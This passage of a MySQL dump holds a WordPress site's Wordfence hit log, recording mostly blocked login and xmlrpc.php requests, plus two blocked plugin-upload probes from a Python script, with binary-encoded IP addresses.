/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfhits` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`attackLogTime` double(17,6) unsigned NOT NULL,
`ctime` double(17,6) unsigned NOT NULL,
`IP` binary(16) DEFAULT NULL,
`jsRun` tinyint(4) DEFAULT 0,
`statusCode` int(11) NOT NULL DEFAULT 200,
`isGoogle` tinyint(4) NOT NULL,
`userID` int(10) unsigned NOT NULL,
`newVisit` tinyint(3) unsigned NOT NULL,
`URL` text DEFAULT NULL,
`referer` text DEFAULT NULL,
`UA` text DEFAULT NULL,
`action` varchar(64) NOT NULL DEFAULT '',
`actionDescription` text DEFAULT NULL,
`actionData` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `k1` (`ctime`),
KEY `k2` (`IP`,`ctime`),
KEY `attackLogTime` (`attackLogTime`)
) ENGINE=InnoDB AUTO_INCREMENT=11451 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfhits`
--
LOCK TABLES `wp_wfhits` WRITE;
/*!40000 ALTER TABLE `wp_wfhits` DISABLE KEYS */;
INSERT INTO `wp_wfhits` VALUES (9539,0.000000,1630314268.996288,'\0\0\0\0\0\0\0\0\0\0��N�Q�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9540,0.000000,1630314793.524954,'\0\0\0\0\0\0\0\0\0\0��h�o�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9541,0.000000,1630314934.736751,'\0\0\0\0\0\0\0\0\0\0��h��.',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9542,0.000000,1630315202.818204,'\0\0\0\0\0\0\0\0\0\0�����[',0,200,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53','loginFailInvalidUsername',NULL,NULL),(9543,0.000000,1630315382.620334,'\0\0\0\0\0\0\0\0\0\0��3\rH�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9544,0.000000,1630315436.063183,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9545,1630315441.692727,1630315441.539500,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(9546,0.000000,1630315943.230624,'\0\0\0\0\0\0\0\0\0\0��_���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9547,0.000000,1630316448.567635,'\0\0\0\0\0\0\0\0\0\0��QX4�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9548,0.000000,1630317079.495750,'\0\0\0\0\0\0\0\0\0\0��g3gI',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9549,0.000000,1630317653.020009,'\0\0\0\0\0\0\0\0\0\0���U��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9550,0.000000,1630318194.071006,'\0\0\0\0\0\0\0\0\0\0���R-',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9551,0.000000,1630318755.108195,'\0\0\0\0\0\0\0\0\0\0��N�(�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9552,0.000000,1630319242.992679,'\0\0\0\0\0\0\0\0\0\0��S�\0',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9553,0.000000,1630319723.778473,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9554,0.000000,1630320197.381776,'\0\0\0\0\0\0\0\0\0\0��l���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9555,0.000000,1630320662.958513,'\0\0\0\0\0\0\0\0\0\0���Gڿ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9556,0.000000,1630321020.142644,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9557,0.000000,1630321137.501536,'\0\0\0\0\0\0\0\0\0\0��Kw�d',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9558,0.000000,1630321585.997863,'\0\0\0\0\0\0\0\0\0\0��QDD�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9559,0.000000,1630322037.751049,'\0\0\0\0\0\0\0\0\0\0��Օg�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9560,0.000000,1630322481.166663,'\0\0\0\0\0\0\0\0\0\0��ٶ��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9561,0.000000,1630322943.028904,'\0\0\0\0\0\0\0\0\0\0���gM�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9562,0.000000,1630323343.249631,'\0\0\0\0\0\0\0\0\0\0��h',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9563,0.000000,1630323696.375822,'\0\0\0\0\0\0\0\0\0\0��Ue�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9564,0.000000,1630323786.496280,'\0\0\0\0\0\0\0\0\0\0��$\\',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(9565,0.000000,1630324170.020859,'\0\0\0\0\0\0\0\0\0\0��JЈ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9566,0.000000,1630324596.063200,'\0\0\0\0\0\0\0\0\0\0��gúT',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9567,0.000000,1630325008.992625,'\0\0\0\0\0\0\0\0\0\0��N.L�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9568,0.000000,1630325229.934550,'\0\0\0\0\0\0\0\0\0\0��:��^',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9569,0.000000,1630325402.769831,'\0\0\0\0\0\0\0\0\0\0��gR',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(9570,0.000000,1630327349.487473,'\0\0\0\0\0\0\0\0\0\0����\ZP',0,503,0,0,0,'https://www.dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9571,0.000000,1630328321.732751,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9572,0.000000,1630329868.706885,'\0\0\0\0\0\0\0\0\0\0��]qo6',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9573,0.000000,1630331422.109640,'\0\0\0\0\0\0\0\0\0\0��ν',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9574,0.000000,1630332968.836096,'\0\0\0\0\0\0\0\0\0\0��-�A*',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9575,0.000000,1630334532.002057,'\0\0\0\0\0\0\0\0\0\0��.e�\"',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9576,0.000000,1630334803.699286,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 5.1; MRA 6.0 (build 5997)) Presto/2.12.388 Version/12.12','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9577,0.000000,1630335376.124360,'\0\0\0\0\0\0\0\0\0\0�����[',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9578,1630335381.105872,1630335381.010700,'\0\0\0\0\0\0\0\0\0\0�����[',0,503,0,0,0,'https://dogstardesign.co.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(9579,0.000000,1630337282.323221,'\0\0\0\0\0\0\0\0\0\0��m�:',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9580,0.000000,1630337412.457610,'\0\0\0\0\0\0\0\0\0\0���;��',0,200,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailInvalidUsername',NULL,NULL),(9581,0.000000,1630337555.539023,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9582,0.000000,1630337733.604156,'\0\0\0\0\0\0\0\0\0\0��[�ȉ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9583,0.000000,1630337863.683444,'\0\0\0\0\0\0\0\0\0\0��\'l\0�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9584,0.000000,1630337893.185600,'\0\0\0\0\0\0\0\0\0\0��DF�\"',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9585,0.000000,1630338046.720853,'\0\0\0\0\0\0\0\0\0\0���c9',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9586,0.000000,1630338210.957743,'\0\0\0\0\0\0\0\0\0\0��gx�V',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9587,0.000000,1630338345.823833,'\0\0\0\0\0\0\0\0\0\0���V�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9588,0.000000,1630338503.022520,'\0\0\0\0\0\0\0\0\0\0���y��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9589,0.000000,1630338697.619552,'\0\0\0\0\0\0\0\0\0\0��DF�\"',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9590,0.000000,1630338845.464396,'\0\0\0\0\0\0\0\0\0\0���!6',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9591,0.000000,1630339010.839269,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9592,0.000000,1630339183.284086,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9593,0.000000,1630339344.072699,'\0\0\0\0\0\0\0\0\0\0��P��o',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9594,0.000000,1630339506.164431,'\0\0\0\0\0\0\0\0\0\0����n�',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9595,0.000000,1630339524.561608,'\0\0\0\0\0\0\0\0\0\0��[�(n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9596,0.000000,1630339694.437540,'\0\0\0\0\0\0\0\0\0\0��gx��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9597,0.000000,1630339869.418527,'\0\0\0\0\0\0\0\0\0\0����T',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9598,0.000000,1630340053.645197,'\0\0\0\0\0\0\0\0\0\0��@��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9599,0.000000,1630340231.734517,'\0\0\0\0\0\0\0\0\0\0����E.',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9600,0.000000,1630340369.033052,'\0\0\0\0\0\0\0\0\0\0��+���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9601,0.000000,1630340552.792358,'\0\0\0\0\0\0\0\0\0\0����6�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9602,0.000000,1630340711.994236,'\0\0\0\0\0\0\0\0\0\0��+���',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9603,0.000000,1630340892.236233,'\0\0\0\0\0\0\0\0\0\0���@u}',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9604,0.000000,1630341089.700939,'\0\0\0\0\0\0\0\0\0\0���Y�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9605,0.000000,1630341152.629972,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://dogstardesign.co.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9606,0.000000,1630341277.268151,'\0\0\0\0\0\0\0\0\0\0��@Z0�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9607,0.000000,1630341455.403852,'\0\0\0\0\0\0\0\0\0\0���U��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9608,0.000000,1630341628.771044,'\0\0\0\0\0\0\0\0\0\0��?�)',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9609,0.000000,1630341791.867878,'\0\0\0\0\0\0\0\0\0\0��}Ϋ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9610,0.000000,1630342502.887599,'\0\0\0\0\0\0\0\0\0\0��[�..',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9611,0.000000,1630342692.852072,'\0\0\0\0\0\0\0\0\0\0���zR',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9612,0.000000,1630343073.962458,'\0\0\0\0\0\0\0\0\0\0��\"}6�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9613,0.000000,1630343455.666350,'\0\0\0\0\0\0\0\0\0\0���Hݾ',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9614,0.000000,1630343654.950688,'\0\0\0\0\0\0\0\0\0\0��g�p',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9615,0.000000,1630343824.063895,'\0\0\0\0\0\0\0\0\0\0��[�n�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9616,0.000000,1630343921.542452,'\0\0\0\0\0\0\0\0\0\0��>Ҵ�',0,503,0,0,0,'https://www.dogstardesign.co.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9617,0.000000,1630344044.012999,'\0\0\0\0\0\0\0\0\0\0��\"Q�n',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9618,0.000000,1630344112.693190,'\0\0\0\0\0\0\0\0\0\0��-���',0,503,0,0,0,'https://www.dogstardesign.co.uk/xmlrpc.php','https://www.dogstardesign.co.uk','Opera/9.80 (Windows NT 5.1; MRA 8.0 (build 6019)) Presto/2.12.388 Version/12.15','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9619,0.000000,1630344232.955892,'\0\0\0\0\0\0\0\0\0\0���S��',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9620,0.000000,1630344464.204152,'\0\0\0\0\0\0\0\0\0\0��ν�V',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9621,0.000000,1630344629.003698,'\0\0\0\0\0\0\0\0\0\0��JЈ�',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9622,0.000000,1630344837.695758,'\0\0\0\0\0\0\0\0\0\0����m',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9623,0.000000,1630345063.009597,'\0\0\0\0\0\0\0\0\0\0����<',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9624,0.000000,1630345243.991738,'\0\0\0\0\0\0\0\0\0\0��C �',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(9625,0.000000,1630345420.044704,'\0\0\0\0\0\0\0\0\0\0��]�xr',0,503,0,0,0,'https://dogstardesign.co.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security 